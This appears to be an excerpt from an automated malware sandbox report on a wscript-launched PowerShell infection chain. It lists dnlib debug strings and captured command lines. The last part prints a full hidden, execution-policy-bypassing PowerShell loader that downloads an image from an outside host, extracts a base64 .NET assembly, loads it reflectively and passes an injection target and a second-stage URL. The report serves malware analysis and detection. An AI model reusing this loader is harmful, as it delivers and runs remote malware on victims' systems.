        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ?", "0", "false");
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7?
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? 